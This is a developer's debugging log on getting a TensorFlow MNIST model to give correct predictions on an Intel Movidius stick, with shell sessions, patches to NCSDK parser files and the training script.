pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py Start prediting ... 2 2 8 2 2 2 2 2 2 2 2 2 8 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 2 2 0 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 0 2 0 2 2 2 2 2 8 2 0 2 2 2 2 2 2 2 2 0 0 2 2 8 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 2 0 2 2 8 2 2 2 2 2 0 2 2 2 2 8 2 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 8 2 2 2 0 2 2 2 8 8 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 8 2 0 2 2 2 0 2 2 8 2 2 2 0 2 0 8 2 2 2 2 2 2 2 8 2 2 2 8 2 8 2 2 2 2 2 2 8 2 2 2 8 2 2 8 8 2 2 2 0 2 2 2 0 0 2 2 2 2 2 8 2 0 2 2 8 2 2 8 2 2 2 2 2 0 2 2 8 2 2 2 2 2 2 0 8 0 2 2 0 2 0 8 0 2 2 2 2 2 2 0 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 2 0 2 0 2 2 2 8 2 2 2 2 2 2 2 0 2 2 0 2 2 8 2 2 8 2 2 0 2 0 2 0 2 2 2 0 2 0 2 2 8 2 2 2 0 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 0 2 2 2 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 0 8 2 2 2 8 2 0 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 0 0 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 8 2 2 0 2 2 2 2 2 2 2 0 2 2 2 2 0 2 2 2 2 8 2 8 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 Time : 4.403196096420288 (500 images)
The output is wrong.
Check with nine images, the digits 1 through 9.
pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00628.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00433.jpg Start prediting ... [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.11402153968811035 (9 images)
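For some reason 4 and 7 are recognized as "8" with 100% confidence, and everything else as "2" with 100% confidence. Try feeding the images in reverse order.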
pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00433.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00628.jpg Start prediting ... [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.11403870582580566 (9 images)
Again, 4 and 7 are recognized as "8" with 100% confidence, and everything else as "2" with 100%.
Starting over from scratch
Training
Run deepmnist.py in jupyter-notebook.
saving graph to: /tmp/tmpc_vjn3sg
step 0, training accuracy 0.08
step 10, training accuracy 0.4
step 20, training accuracy 0.46
(omitted)
step 470, training accuracy 0.96
step 480, training accuracy 0.92
step 490, training accuracy 0.96
test accuracy 0.939
The test accuracy is 0.939, so training worked correctly.
Confirm that the output files were saved correctly.
tokunn@tokunn-VirtualBox 13:49:04 [~/Documents/MovidiusTensorflow/mnist0911]
$ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/
Then save again for Movidius.
tokunn@tokunn-VirtualBox 13:51:43 [~/Documents/MovidiusTensorflow/mnist0911]
$ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_inference.data-00000-of-00001
mnist_inference.index
mnist_inference.meta
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/
Run the compile.
mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
Try predicting with Movidius on the RPi.
pi@raspberrypi:~/week2/mnist0911 $ python3 prediction_byMovidius4mvncV1.py ../../JPEGImages/pickup/00433.jpg ../../JPEGImages/pickup/00683.jpg ../../JPEGImages/pickup/00663.jpg ../../JPEGImages/pickup/00520.jpg ../../JPEGImages/pickup/00013.jpg ../../JPEGImages/pickup/00652.jpg ../../JPEGImages/pickup/00025.jpg ../../JPEGImages/pickup/00042.jpg ../../JPEGImages/pickup/00628.jpg Start prediting ... [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] [0. 0. 0. 0. 0. 0. 0. 0. 1. 0.] Time : 0.1024773120880127 (10 images)
Still no change.
Trying a real machine instead of the RPi 3
The Raspberry Pi itself might be at fault, so try on an actual Linux machine (Ubuntu 16.04, nanase).
tokunn@nanase 7:11:40 [~/Documents/week2/0911] $ python3 prediction_byMovidius4mvncV1.py ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory Image path : ./JPEGImages/*.jpg Start prediting ... [ 0. 0. 0. 0. 0. 1. 0. 0. 0. 0.] [ 1. 0. 0. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] [ 3.35454941e-04 0.00000000e+00 0.00000000e+00 0.00000000e+00 1.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00 0.00000000e+00] [ 0. 0. 0. 0. 0. 1. 0. 0. 0. 0.] [ 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.] Time : 0.0796973705291748 (10 images)
Something is still wrong.
So this is not caused by the Raspberry Pi.
Perhaps the problem is the graph file generated by mvNCCompile?
Checking whether the files saved by TensorFlow are correct
In jupyter-notebook, restore from mnist_model and run predictions.
INFO:tensorflow:Restoring parameters from ./output/mnist_model test accuracy 0.9477
Prediction works without problems.
Checking whether the file passed to mvNCCompile is correct
If this works correctly, the problem is mvNCCompile.
Otherwise the file fed into it is bad.
In jupyter-notebook, restore from mnist_inference and run predictions.
INFO:tensorflow:Restoring parameters from ./output/mnist_inference test accuracy 0.9477
This one also predicts without problems. ---> The problem is somewhere around mvNCCompile.
Checking the model with mvNCCheck
Use mvNCCheck to check the model.
tokunn@nanase 8:20:05 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 USB: Transferring Data... USB: Myriad Execution Finished USB: Myriad Connection Closing. USB: Myriad Connection Closed. Result: (1, 1, 10) 1) 8 0.69141 2) 2 0.10852 3) 4 0.075806 4) 3 0.047607 5) 5 0.028824 Expected: (1, 10) 1) 8 0.685481 2) 2 0.111384 3) 4 0.078136 4) 3 0.0483064 5) 5 0.0283811 ------------------------------------------------------------ Obtained values ------------------------------------------------------------ Obtained Min Pixel Accuracy: 0.8644439280033112% (max allowed=2%), Pass Obtained Average Pixel Accuracy: 0.19093991722911596% (max allowed=1%), Pass Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass Obtained Pixel-wise L2 error: 0.325355674229958% (max allowed=1%), Pass Obtained Global Sum Difference: 0.013088561594486237 ------------------------------------------------------------
Result (the Movidius output) and Expected (the TensorFlow output) are almost identical, so the compiled graph appears to work correctly.
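The "almost identical" judgment can be checked numerically. The following is a minimal sketch that only uses the top-5 values printed by mvNCCheck above; the helper names same_ranking and max_abs_diff are made up for this illustration and are not part of the NCSDK.

```python
# Top-5 (label, probability) pairs copied from the mvNCCheck output above.
result = [(8, 0.69141), (2, 0.10852), (4, 0.075806), (3, 0.047607), (5, 0.028824)]
expected = [(8, 0.685481), (2, 0.111384), (4, 0.078136), (3, 0.0483064), (5, 0.0283811)]


def same_ranking(a, b):
    """Return True when both lists rank the labels in the same order."""
    return [label for label, _ in a] == [label for label, _ in b]


def max_abs_diff(a, b):
    """Largest absolute probability gap between entries at the same rank."""
    return max(abs(pa - pb) for (_, pa), (_, pb) in zip(a, b))


print("same ranking:", same_ranking(result, expected))
print("max abs diff:", max_abs_diff(result, expected))
```

The ranking is the same and the largest gap stays below 0.01, which is consistent with mvNCCheck reporting Pass on every metric.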
Does that mean the problem is in the NCAPI used for inference?
Recognizing an image with mvNCCheck
Adding the -i option to mvNCCheck lets you specify your own image file as input.
tokunn@nanase 8:58:09 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 266, in parse_tensor int(shape[3]), IndexError: list index out of range
The library file /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py raises IndexError: list index out of range yet again.
I really wish TensorFlowParser would check the number of elements before indexing into a list.
For now, enable debug=True on line 204 and add a line that prints shape.
204c204 < # debug = True --- > debug = True 263a264 > print("Input image shape", shape)
Running this:
tokunn@nanase 9:25:28 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 267, in parse_tensor int(shape[3]), IndexError: list index out of range
This is the result.
It shows that the input shape is [1, 784].
Running without the -i [image] option gives:
tokunn@nanase 9:26:30 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] 0 Const Const OUT: Const:0 /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290 1 VariableV2 Variable OUT: Variable:0 (略) BiasAdd 75 Softmax output IN: fc2/add:0 OUT: output:0 Softmax (略) Result: (1, 1, 10) 1) 8 0.32178 2) 4 0.22034 3) 2 0.14233 4) 0 0.10773 5) 3 0.1059 (略)
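This run completes correctly.
The input shape is [1, 784], the same as when the error occurred.
Wait, why is a CNN being fed a flat vector (the 2-D shape [1, 784])?
Shouldn't it be [1, 28, 28]?
-> The network reshapes the input to 28x28 right after it is fed in.
I want to feed 2-D input ([1, 784]), but TensorFlowParser apparently insists on at least four dimensions.
But then why does nothing go wrong when it generates random input internally?
For now, look for the definition of the parse_img() in question.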
tokunn@nanase 9:55:12 [/opt/movidius/NCSDK/ncsdk-x86_64/tk/Models] $ find / -type f 2>/dev/null | grep .py | xargs grep parse_img 2>/dev/null /usr/local/bin/ncsdk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None): /opt/movidius/NCSDK/ncsdk-armv7l/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None): /opt/movidius/NCSDK/ncsdk-x86_64/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
It is apparently in /usr/local/bin/ncsdk/Controllers/MiscIO.py.
# Definition
227 def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
228     """
229     Parse an image with the Python Imaging Libary and convert to 4D numpy array
234     """
There it is.
For reference, the call site is in
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
# Call site
266: input_data = parse_img(image,
267-                        [int(shape[0]),
268-                         int(shape[3]),
269-                         int(shape[1]),
270-                         int(shape[2])],
271-                        raw_scale=arguments.raw_scale,
272-                        mean=arguments.mean,
273-                        channel_swap=arguments.channel_swap)
That is how it is called.
I want to know what to pass as the call's arguments, so trace through parse_img().
/usr/local/bin/ncsdk/Controllers/MiscIO.py
248 if path.split(".")[-1].lower() in ["png", "jpeg", "jpg", "bmp", "gif"]: 250 greyscale = True if new_size[2] == 1 else False
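Apparently new_size[2] (the third element of the list) is used to check the number of color channels.
So int(shape[1]) would be 1 in this case.
The first argument, path (image at the call site), is the path to the image file.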
279 if (len(data.shape) == 2): 280 # Add axis for greyscale images (size 1) 281 data = data[:, :, np.newaxis] 282 283 data = skimage.transform.resize(data, new_size[2:]) 284 data = np.transpose(data, (2, 0, 1)) 285 data = np.reshape(data, (1, data.shape[0], data.shape[1], data.shape[2])) 286 287 data *= raw_scale
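First, a greyscale image has shape (x, y) only, so one axis is added to make it 3-D.
The shape is now (x, y, number of color channels).
Next, new_size[2] and new_size[3] are used as the resize target.
At the call site these are int(shape[1]) and int(shape[2]), but wasn't int(shape[1]) supposed to indicate whether the image is greyscale?
new_size is used in only these two places.
What is going on here?
Next, the axes are swapped so that (x, y, number of color channels) becomes (number of color channels, x, y).
Incidentally, in the random-value case that works correctly, input_data (inside TensorFlowParser) is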
259 input_data = np.random.uniform(0, 1, shape)
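so in the end input_data should have the original shape (1, 784).
From this information, work out what the arguments should be.
First, the arguments other than new_size can stay as they are.
As for the shape to pass as new_size, an image batch is normally laid out as (number of images, x, y, number of color channels).
The call site rearranges this into [number of images, number of color channels, x, y].
Therefore the argument becomes [1, 1, shape[0], shape[1]].
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py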
268,271c268,271 < [int(shape[0]), < int(shape[3]), < int(shape[1]), < int(shape[2])], --- > [int(1), > int(1), > int(shape[0]), > int(shape[1])],
However, as it stands, the line
250 greyscale = True if new_size[2] == 1 else False
decides whether the image is greyscale by looking at the x value.
So change new_size[2] to new_size[1]. Is the original a typo?
/usr/local/bin/ncsdk/Controllers/MiscIO.py
250c250 < greyscale = True if new_size[2] == 1 else False --- > greyscale = True if new_size[1] == 1 else False
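The effect of the index change can be sketched in a few lines. This assumes new_size is laid out as [N, C, H, W], as the patched call site builds it; the two function names and the 28x28 example are hypothetical and only mirror the one-line check in MiscIO.py.

```python
def is_greyscale_original(new_size):
    # Mirrors the original check, which looks at index 2 (H in N, C, H, W).
    return new_size[2] == 1


def is_greyscale_patched(new_size):
    # Mirrors the patched check, which looks at index 1 (C in N, C, H, W).
    return new_size[1] == 1


# Hypothetical 28x28 single-channel image described as [N, C, H, W].
nchw = [1, 1, 28, 28]
print(is_greyscale_original(nchw))  # False
print(is_greyscale_patched(nchw))   # True
```

For the [1, 1, 1, 784] argument actually used in these notes, both checks happen to agree because the height is also 1; the difference only shows up for inputs whose height is not 1.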
Running with this patch applied:
tokunn@nanase 11:16:22 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Input image shape [1, 784] image path ../JPEGImages/pickup/00013.jpg /usr/local/lib/python3.6/dist-packages/skimage/transform/_warps.py:84: UserWarning: The default mode, 'constant', will be changed to 'reflect' in skimage 0.15. warn("The default mode, 'constant', will be changed to 'reflect' in " Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 274, in parse_tensor channel_swap=arguments.channel_swap) File "/usr/local/bin/ncsdk/Controllers/MiscIO.py", line 290, in parse_img data[0] = data[0][np.argsort(channel_swap), :, :] IndexError: index 2 is out of bounds for axis 0 with size 1
This produces a new error.
So apply another patch for now.
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
272,274c272,274 < raw_scale=arguments.raw_scale, < mean=arguments.mean, < channel_swap=arguments.channel_swap) --- > raw_scale=1, > mean=None, > channel_swap=None)
Running with this:
tokunn@nanase 11:41:03 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 input_data shape (1, 1, 1, 784) Traceback (most recent call last): File "/usr/local/bin/mvNCCheck", line 152, in <module> quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args) File "/usr/local/bin/mvNCCheck", line 130, in check_net net = parse_tensor(args, myriad_config, file_gen=True) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 281, in parse_tensor res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data}) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 570, in eval return _eval_using_default_session(self, feed_dict, self.graph, session) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/ops.py", line 4455, in _eval_using_default_session return session.run(tensors, feed_dict) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 889, in run run_metadata_ptr) File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1096, in _run % (np_val.shape, subfeed_t.name, str(subfeed_t.get_shape()))) ValueError: Cannot feed value of shape (1, 1, 784, 1) for Tensor 'input:0', which has shape '(1, 784)'
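Yet another error.
There is no end to this.
Is there any point in doing this?
Is it really necessary to feed an image to mvNCCheck?
Shouldn't I be tracing the Python API instead?
The random-input run of mvNCCheck made me think the graph was correct, but if the generated graph were wrong in the first place, wouldn't the TensorFlow run also produce wrong results?
DAY2
As expected, converting the data to 4-D does not help: the network input is 2-D, so the 4-D array cannot be fed in.
So apply an even cruder patch.
With this, images of any other shape cannot be fed in and no other network is supported.
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py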
204c204 < debug = True --- > # debug = True 277a278 > input_data = input_data.transpose([0, 1, 3, 2])[0][0] 279a281 > #print(input_data) 297d298 < print("/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290")
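What the added transpose line does to the array shape can be seen in isolation. This is a minimal sketch assuming input_data has the shape (1, 1, 784, 1) reported in the ValueError above; the array contents are dummy values, not real image data.

```python
import numpy as np

# Dummy stand-in for the array returned by parse_img(), using the shape
# reported in the ValueError above: (1, 1, 784, 1).
input_data = np.arange(784, dtype=np.float32).reshape(1, 1, 784, 1)

# Same expression as the patch: swap the last two axes, then drop the
# two leading axes of length 1.
patched = input_data.transpose([0, 1, 3, 2])[0][0]

print(input_data.shape)  # (1, 1, 784, 1)
print(patched.shape)     # (1, 784)
```

The result matches the (1, 784) shape that the 'input:0' placeholder expects, which is why the feed stops failing. It also shows why the patch is model-specific: it hard-codes the assumption that the first two axes have length 1.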
Run it.
tokunn@nanase 23:49:44 [~/Documents/week2/0912/output] $ for i in $(ls ../JPEGImages/pickup/); do echo $i; mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/$i 2>/dev/null; done 1.jpg Result: (1, 1, 10) 1) 2 0.28613 Expected: (1, 10) 1) 2 0.281931 ------------------------------------------------------------ 2.jpg Result: (1, 1, 10) 1) 2 0.81348 Expected: (1, 10) 1) 2 0.81391 ------------------------------------------------------------ 3.jpg Result: (1, 1, 10) 1) 2 0.87158 Expected: (1, 10) 1) 2 0.870968 ------------------------------------------------------------ 4.jpg Result: (1, 1, 10) 1) 3 0.39771 Expected: (1, 10) 1) 3 0.40986 ------------------------------------------------------------ 5.jpg Result: (1, 1, 10) 1) 2 0.70898 Expected: (1, 10) 1) 2 0.712083 ------------------------------------------------------------ 6.jpg Result: (1, 1, 10) 1) 5 0.77686 Expected: (1, 10) 1) 5 0.773194 ------------------------------------------------------------ 7.jpg Result: (1, 1, 10) 1) 5 0.49268 Expected: (1, 10) 1) 5 0.499106 ------------------------------------------------------------ 8.jpg Result: (1, 1, 10) 1) 2 0.95605 Expected: (1, 10) 1) 2 0.955554 ------------------------------------------------------------ 9.jpg Result: (1, 1, 10) 1) 2 0.50293 Expected: (1, 10) 1) 2 0.494139 ------------------------------------------------------------
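Again, most digits are reported as 2.
However, when run through mvNCCheck the probabilities are not 100%.
The same results come back whether the graph is called from the Python API or from mvNCCheck.
This suggests that the converted graph file is wrong.
Either the file passed to mvNCCompile or mvNCCompile itself is at fault.
Trying the deep_mnist sample with the code on GitHub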
A deep_mnist sample was available on GitHub. https://github.com/ashwinvijayakumar/ncappzoo/tree/mnist/tensorflow/mnist
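It works.
It still works after reverting the mvNCCompile patch.
It also works with my own graph and JPEG.
Huh?
Does this mean I was not using the API correctly?
(Of course, mvNCCheck -i still raises IndexError.)
Still, the Intel sample was definitely wrong.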
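Causes
- The model was trained on white digits on a black background, but inference was run on images with black digits on a white background
- I forgot to divide by 255 after loading the images
- The image-loading feature of mvNCCheck does not work
What I had taken to be broken output all along was in fact the correct output for the input it was given.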
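The first two causes come down to two preprocessing steps. The following is a minimal NumPy sketch, assuming an 8-bit greyscale image with black digits on a white background; the function name preprocess and the 2x2 sample are hypothetical and only illustrate the arithmetic.

```python
import numpy as np


def preprocess(gray_uint8):
    """Invert a black-on-white uint8 image and scale it to the range [0, 1]."""
    # Invert so that the digit becomes bright on a dark background, as in MNIST.
    inverted = 255.0 - gray_uint8.astype(np.float32)
    # Scale from [0, 255] to [0, 1], matching the range used during training.
    return inverted / 255.0


# Hypothetical 2x2 image: white background (255) with one black pixel (0).
sample = np.array([[255, 255], [0, 255]], dtype=np.uint8)
out = preprocess(sample)
print(out)
```

After this step the background is 0.0 and the stroke pixel is 1.0, which is the convention of the MNIST training data.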
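Conclusion (working method and source code)
Three problems were solved.
1. The TensorFlow model could not be compiled with mvNCCompile
-> Rewrite TensorFlowParser.py
2. mvNCCheck is supposed to load an image with the -i option, but it does not work
-> Rewrite TensorFlowParser.py and MiscIO.py to fit the model (not general-purpose)
3. The inference results were wrong
-> The input was wrong
Patching mvNCCompile
Edit /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py around line 290 so that the list is checked for elements before it is accessed.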
< if have_first_input(strip_tensor_id(node.outputs[0].name)): --- > if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):
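The patch relies on short-circuit evaluation: the right-hand side of `and` is only evaluated when the list is non-empty. Here is a minimal sketch of the same guard; FakeNode and has_matching_output are hypothetical stand-ins for illustration, not NCSDK or TensorFlow classes.

```python
class FakeNode:
    """Hypothetical stand-in for a graph node with a list of output names."""

    def __init__(self, outputs):
        self.outputs = outputs


def has_matching_output(node, predicate):
    # outputs[0] is only touched when the list has at least one element,
    # so an empty list yields False instead of raising IndexError.
    return bool(len(node.outputs)) and predicate(node.outputs[0])


def is_input(name):
    return name.startswith("input")


print(has_matching_output(FakeNode([]), is_input))           # False
print(has_matching_output(FakeNode(["input:0"]), is_input))  # True
```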
With this, mvNCCompile runs through.
Patching mvNCCheck
Edit /usr/local/bin/ncsdk/Controllers/MiscIO.py around line 250.
250c250 < greyscale = True if new_size[2] == 1 else False --- > greyscale = True if new_size[1] == 1 else False
Edit /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py around line 270.
265,271c265,271 < [int(shape[0]), < int(shape[3]), < int(shape[1]), < int(shape[2])], < raw_scale=arguments.raw_scale, < mean=arguments.mean, < channel_swap=arguments.channel_swap) --- > [int(1), > int(1), > int(shape[0]), > int(shape[1])], > raw_scale=1, > mean=None, > channel_swap=None) 272a273 > input_data = input_data.transpose([0, 1, 3, 2])[0][0]
With these changes, the command
mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../github_deep_mnist/ncappzoo/data/digit_images/one.png -S 255
starts working. The result is still questionable, though. Perhaps the input image needs preprocessing?
Main program (training)
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile


def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1])  # -1 = number of x
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2 = bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
    with tf.name_scope('pool1'):
        h_pool2 = max_pool_2x2(h_conv2)
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
    with tf.name_scope('dropout'):
        keep_prob = tf.placeholder(tf.float32)
        h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    return y_conv, keep_prob


def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')


def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')


def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1)  # random
    return tf.Variable(initial)


def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape)  # all 0.1
    return tf.Variable(initial)


def main():
    mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
    x = tf.placeholder(tf.float32, [None, 784], name='input')
    y_ = tf.placeholder(tf.float32, [None, 10])
    y_conv, keep_prob = deepnn(x)
    with tf.name_scope('loss'):
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)
    cross_entropy = tf.reduce_mean(cross_entropy)
    with tf.name_scope('adam_optimizer'):
        train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
    with tf.name_scope('accuracy'):
        correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
        correct_prediction = tf.cast(correct_prediction, tf.float32)
    accuracy = tf.reduce_mean(correct_prediction)
    graph_location = tempfile.mkdtemp()
    print('saving graph to: %s' % graph_location)
    train_writer = tf.summary.FileWriter(graph_location)
    train_writer.add_graph(tf.get_default_graph())
    saver = tf.train.Saver()
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for i in range(500):
            batch = mnist.train.next_batch(50)
            if i % 10 == 0:
                train_accuracy = accuracy.eval(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})
                print('step %d, training accuracy %g' % (i, train_accuracy))
            train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
        print('test accuracy %g' % accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
        graph_location = "."
        save_path = saver.save(sess, graph_location + "/mnist_model")


main()
Model conversion script
